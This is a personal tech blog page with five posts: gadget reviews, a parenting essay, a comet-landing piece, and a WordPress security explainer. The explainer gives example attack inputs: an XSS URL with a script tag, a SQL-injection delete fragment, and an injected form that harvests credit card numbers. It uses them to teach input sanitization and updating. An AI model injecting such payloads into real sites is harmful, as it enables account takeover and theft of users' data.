Mobile Scanning with A Transforming ScanSnap

Posted by TechyDad on July 7, 2015 under Review, Technology

Since the advent of scanners, people have been taking paper documents and converting them to digital files.  These files have many advantages over paper.  They take up less space, are easier to search through, can be quickly sent to friends and family, and allow for simple backing up.  The only downside of scanners is that they take up a lot of room, require a computer to be hooked up to them, and can require a lid to be lifted and lowered every time the paper to be scanned needs changing.  (The latter of which can make multiple scan

Enter the ScanSnap iX500.  Where other scanners offer a flatbed approach which takes up a lot of space, the iX500 starts off as a relatively small shell.  This compact shape means that it takes up much less space than a conventional scanner.

scansnap-folded-up

When you need to use the scanner, however, the scanner’s shell unfolds until the full scanner is revealed.

scansnap-unfolding

scansnap-ready-to-scan

When I showed this to my boys, they exclaimed that it’s a transformer and it sure is.

Another annoyance about some scanners is that you need to hook your computer up to them with a cord.  Sure, USB cords are handy and pretty standardized, but they are still cords.  The iX500 takes a wireless approach.  After an initial corded setup, during which the iX500 obtains your network’s wireless credentials, the iX500 can be accessed from the wireless network without any cord connecting the scanner and the computer.  In fact, you can use an iOS or Android app to wirelessly scan to your mobile phone or tablet.

scansnap-mobile-app

You can even edit the resulting PDFs to delete pages or rotate pages (for example, if you accidentally put the paper in upside down).  As with anything on a mobile device, the resulting file can easily be shared with some other app or service.  You can quickly attach the PDF to an e-mail, upload them to a cloud server, or just open them for reading.  The generated PDFs are nice quality also.  Here’s a recipe that I scanned in for Bon Bon Cookies.

Finally, the scanner’s feeder setup means that you can load in a small stack of papers and have the scanner pull them through one at a time until all of them are scanned.  This winds up being much simpler and quicker than replacing papers on a flatbed scanner.

As I mentioned before, my boys were amazed when they saw the scanner transform.  Once they saw the little blue "Scan" icon on my phone, though, they were itching to scan something.  They grabbed artwork that they had made, award certificates that they earned, and more.  One by one, they fed them into the scanner and presses the scan button on my phone.  One by one, the papers came out and the PDFs appeared on my phone.  Eventually, I had to stop them due to a combination of running out of papers to scan and a bedtime that had passed.  I’ve shied away from scanning in the past due to the time it took to boot my computer, hook up the scanner, and hope it all worked.  With the ScanSnap, however, all I need to do is flip open the shell, place in the paper, and use my mobile device to scan in the document.

Quick.  Easy.  And doesn’t take up much room.  The ScanSnap definitely is a scanner that will be getting plenty of use.

Share:
Share on Facebok
Share on Twitter
Share on Pinterest
Share on Google+

Why You Need To Upgrade WordPress Now (and Back It Up While You’re At It)

Posted by TechyDad on April 28, 2015 under Blogging, Internet, Technology

Last week, there was a big announcement in the WordPress world about a security vulnerability existing within many plugins.  Plugin authors scrambled to fix the issues quickly while the call went out for everyone to update their plugins and Word Press installations.  As a web developer, I understood what the vulnerability was all about, why it could be so dangerous, and what an attacker could use it to do.  As I thought about it, though, I realized that non-web developers might need a quick primer on just what the problem was.

The Problem

Word Press can be a wonderful tool for developers.  Not only is it a Content Management System, but it has a series of functions available to programmers to use in the course of writing code.  You don’t have to re-invent the wheel because Word Press has built in functions that can be used to complete the job.  A long time ago, there might have been security concerns with WordPress’s functions.  Thankfully, though, the WordPress team has put a lot of effort into security.  Unfortunately, the documentation for a couple of the functions were vague.  Developers thought that two of the functions were sanitizing the user’s input when they weren’t.

Clean That Input

What does sanitizing input mean?  It means that a developer should never trust what a user enters into a system.  If a user is prompted to enter a number between 1 and 10, it shouldn’t be assumed that they didn’t type 11.  Or abc.  Or ‘ and 1=1; Delete From Users.  If the wrong user input is blindly accepted, the program might give bad results, crash, or – even worse – allow a malicious user to run commands that could compromise the security of the server, its data, and subsequent users.  Luckily, before user input is used, it can be checked and potentially harmful contents can be neutralized.  In the case of the WordPress vulnerability, the lack of cleaning up user input meant that a Cross-Site Scripting (XSS) attack could be formed.

What is XSS?

Cross Site Scripting (or XSS) happens when malicious user input placed on a website and is used to run scripts on a user’s computer.  Suppose, a blog had a comment page that had a XSS vulnerability.  An attacker could craft a link in the form of

http://www.someblog.com/comment.php?Username=<script>document.cookie = "expires: Wed, 1 Apr 2015 12:00:00 UTC; path=/";</script>

This particular link would erase the person’s cookies – effectively logging the person out of the website.  Annoying, but ultimately harmful.  However, a more advanced form of this attack might read information stored in the cookie variables (e.g. usernames, passwords) and send them to the attacker (perhaps by using JavaScript to load an image with the data to send in the image’s link).  If the attacker sent this more advanced link to a user, he could take control of that user’s account.

Now, imagine a comment form.  The basic comment form is quite simple.  Just take the user’s comment and display it on the website.  Not hard, right?  If I input:

Very nice article.  I agree wholeheartedly.

then that should appear on the page.  What, however, should happen if I write:

Very nice article.  I agree wholeheartedly.  <form action=”http://www.somewebsite.com/”>Credit Card Number: <input type=”text” name=”CCNumber” /><input type=”submit” /></form>

Should that appear on the page as is?  In case you don’t “speak HTML”, that comment – if left unfiltered – would make a form appear on the page asking for a user’s credit card number. This phony form won’t fool anyone, of course, but a more advanced version of this could wipe out all elements on a page and display a real looking login page – with the usernames/passwords being sent to the attacker (and logging the users in if the attacker wanted to be extra sneaky).  The form could also ask for a user’s personal information or payment information – compromising the user’s credit card number or other details.

In all of these cases, the attacker uses not only the XSS vulnerability, but the trustworthiness of the website being used to fool users.  If your users usually pay for access to your website, they might not think anything is wrong when your website suddenly reports that it needs to confirm the users’ credit card numbers.

How Do I Stop XSS?

Stopping Cross-Site Scripting attacks is actually very simple.  I even had to resort to it while writing this article.  My blog post editor kept wanting to turn some of the HTML tags into actual HTML.  To keep it from doing this, I replaced all “<” angle brackets with &lt; (the HTML code for “<“) and all “>” angle brackets with &gt (the HTML code for “>”).  Doing this to user input should make the attacker’s HTML code show instead of being interpreted and run.  Of course, to do this, you need to know how to work with the code behind websites.

But What About WordPress Plugins?

When you use WordPress plugins, you need to have some level of trust as to the quality of the code.  Few users have the time (or the skill) to pour over all of the code in all of their plugins to spot all of the vulnerabilities.  The best most users can hope for is that the developers (or users with the time and skill) find the bugs and fix them.  This fixes will be posted as updated versions.  This is why it is essential to keep WordPress, its plugins, and its themes up to date.  It doesn’t matter if the vulnerability in Really Cool Plugin was fixed in version 1.3 if you’re still running version 1.2.  And don’t think you can hide behind people not knowing what version you are running.  Hackers can use automated tools to scan many sites for many different vulnerabilities – only giving their attention to the openings that they want to exploit.

How do you update?

To update your WordPress installation, log into your WordPress installation’s admin panel (usually http://www.yoursite.com/wp-admin/).  Under Dashboard on the left hand side is a menu option called “Updates.”  Clicking this leads you to a page where you can update the WordPress core installation, plugins, and themes.  (In the case of the latter, bad coding can lead to security holes within themes which might be patched with a new version of the theme.)

What about plugins with no updates?

Not every plugin author updates his plugins on a timely fashion.  Whether because he is busy on other projects or because the plugin you are using isn’t being actively developed anymore, you might still find yourself running vulnerable plugins.  Worse still, you might not know it until the plugin is exploited.  There are security plugins that can be used to mitigate the risk, but in the end one of the best defenses is a good backup.  Make sure that you have backups of your website files as well as your database.  With luck, you’ll never need them, but if you do you will be glad that you had them.

Techydad Backup & Update Service.

There are many WordPress plugins that one can use to backup ones WordPress sites.  If anyone needs any assistance, I’d like to extend an offer, though.  I’ll backup your website and database once a week as well as run monthly updates on your site for a monthly fee.  If you are interested, contact me and we can discuss pricing.

Stay safe online and happy blogging, everyone!

Share:
Share on Facebok
Share on Twitter
Share on Pinterest
Share on Google+

Chasing the Shiny

Posted by TechyDad on January 14, 2015 under Life, Parenting, Technology

DTRave-Cartoon-Computer-and-DesktopWith the new year comes the end of the Chanukah/Christmas gift-giving season.  Now, as things settle down to routine, we begin to see which of the boys’ new acquisitions will get played with often and which will be placed aside after one go-around.  Which will still be used months from now and which won’t be used after a few days have passed.  We also get to see how long these new acquisitions quench the urge to chase the shiny.

My boys love new things.  They are always begging for new apps and games for their tablets, new toys, or to record new TV shows.  They love everything new.  (Well, not everything.  New foods still tend to elicit more "yucks" than "yays".)  This isn’t to say that they don’t like older things.  However, today’s fast-paced world has reached the youngest of kids and they always seem to be looking for what they are getting next.

There are days when I worry that we’re raising a generation that acquires, uses once or twice, and discards in favor of the next new thing.  Unfortunately, our kids aren’t the only ones.  The urge to get the next new thing seems to have worked its way into our society.  How many of us happily trade a device in for the newer model when the older model is only a couple of years old?  How many people will toss out a perfectly working TV set because the new one comes with cool new features?  How many people don’t bother finishing an old game on their smartphone because there’s a new one that everyone is playing?

This might be weird coming from someone who calls himself "TechyDad."  Yes, I’m guilty of "chasing the shiny" too.  Though I can’t afford every piece of new tech, I do drool over them.  Were money no object, my house would be fitted out with the best in new technology and I’d constantly be getting some new acquisitions to satiate me.  I’ve had my share of toys that I bought that I just *had* to have which I didn’t look at a month later.  That gyros wrist exerciser comes to mind.  Similar to this model, it was supposed to help with some carpal tunnel I was suffering from.  Instead, I used it about three times before putting it in a drawer.  I’d take it out to show people as a conversation piece, but that was it.  It was shiny and I had to have it – until I had it at which time I didn’t really care enough to use it.

I don’t want my boys to be afraid of change and of new technology.  To survive in this world, you need to be able to surf the changing currents.  However, I also think it’s important to keep a sense of perspective of where you’ve come from and what other shiny temptations have brought with them.  Being able to spot when the shiny brings helpful changes and when it’s all flash and no substance is key.

Do you find yourself chasing the shiny?  How do you teach your children what shiny is good to pursue and what to avoid?

NOTE: The image above is "Cartoon Computer and Desktop" by DTRave and is available via OpenClipArt.org.

Share:
Share on Facebok
Share on Twitter
Share on Pinterest
Share on Google+

ROBOT ON A COMET!!!

Posted by TechyDad on November 14, 2014 under Space, Technology

Over the past ten years, a small craft named Rosetta has been travelling through the cold, dark reaches of space.  It swung past Earth three times and Mars once before it reached its destination: Comet 67P.  In early August, Rosetta performed an extremely tricky feat.  It entered into orbit around the comet.  You might think that this shouldn’t be too hard, but comets aren’t very massive.  Too much thrust one way or another and Rosetta would have gone tumbling away from the comet and into space.  Two days ago, though, Rosetta topped this already incredible achievement.  It detached a lander – Philae – which descended to the comet’s surface making it the first craft ever to land on a comet.  (There was a mission called Deep Impact which "landed" something on a comet, but that was a chunk of copper which was purposefully impacted with the comet to examine the result.)

The landing didn’t go perfectly.  Philae was supposed to touch down, deploy a harpoon to reel itself in, and then use ice drills to secure itself into place.  Instead, the harpoon didn’t fire and Philae bounced. Twice.  It landed on its side near a cliff.

Still, this is amazing.  This comet is 317 million miles from Earth.  At that distance, communication between the lander and Earth takes 28 minutes.  This meant that mission control couldn’t steer the lander itself.  Imagine trying to drive a car if there was a 28 minute delay between pushing on the brakes, turning the wheel, or hitting the gas and that action actually happening.  This meant that the lander had to land itself without any help from anybody.  This is a robot that we build landing on a comet.

This amazing feat just blows my mind.  To think that not that long ago, mankind thought of comets as evil, supernatural omens.  Now we have the technological capability to launch a spacecraft, fly by planets multiple times, enter into orbit with, and then land on a comet.  I feel like Benny from The Lego Movie.  Only instead of shouting "SPACESHIP!", I want to run around shouting "ROBOT ON A COMET!!!"

Just to close, it gets even better, "robot on a comet" has sent back photos of said comet.

Welcome_to_a_comet

Those rocks that we here on Earth are seeing are over 300 million miles away and are a window into how the solar system looked billions of years ago.  Sometimes, you just have to sit back and be amazed by what we are capable of, technologically.

Share:
Share on Facebok
Share on Twitter
Share on Pinterest
Share on Google+

Bluetooth On The Go With The Kinivo BTC450

Posted by TechyDad on October 22, 2014 under Review, Technology

BTC450If I want to talk on the phone while driving, I’ve got to carry a Bluetooth headset along with me and remember to keep it charged.  If I want to listen to music from my phone in the car, I need to plug the phone into the speaker with a wire and control the music with the phone itself.  Neither situation is optimal.  Enter the Kinivo BTC450 Bluetooth Hands-Free Car Kit.

The BTC450 consists of three components.  The first is a power plug that goes in your car’s cigarette lighter.  This provides power to the entire unit as well as giving you a USB port to charge your device.  The second part is a plug that goes into your stereo’s auxiliary input.  The third, and perhaps most important, component is a small button.

Button

This button might be small, but it is quite powerful.  It connects to your smartphone via Bluetooth and routes audio from your phone to your car’s speaker system (via the aforementioned auxiliary input plug).  It also acts as a microphone so the people you are talking to on the phone can hear you.  Pressing the button can both begin or end a phone call.  Finally, two small buttons on top allow you to skip ahead or go back while listening to music.  No longer do you have to pick up your cell phone while driving (a very unsafe thing to do), just press the button.

Of course, all of this wouldn’t be worth anything if the audio quality wasn’t good.  In my testing, the audio coming from the speakers (routed from the BTC450) was very good.  The people I called initially reported that I sounded muffled, but I repositioned the button/microphone and they said that I was coming in much clearer.  The button comes with adhesive to affix it on your dashboard for easy access.  I positioned it on a spot on my dashboard without the adhesive, but if you do stick it on, I’d recommend trying it out before using the adhesive.

Overall, this was a very nice way of enabling Bluetooth access in my car.  Considering that the BTC450 only costs $39.99 (affiliate link), it is quite an inexpensive method of adding Bluetooth to your car as well.  This is definitely a device that will get plenty of use every time I go for a drive.

DISCLAIMER: I was sent a Kinivo BTC450 Bluetooth Hands-Free Car Kit to review.  The opinions expressed above are my own.  No compensation (other than the product) was provided.

Share:
Share on Facebok
Share on Twitter
Share on Pinterest
Share on Google+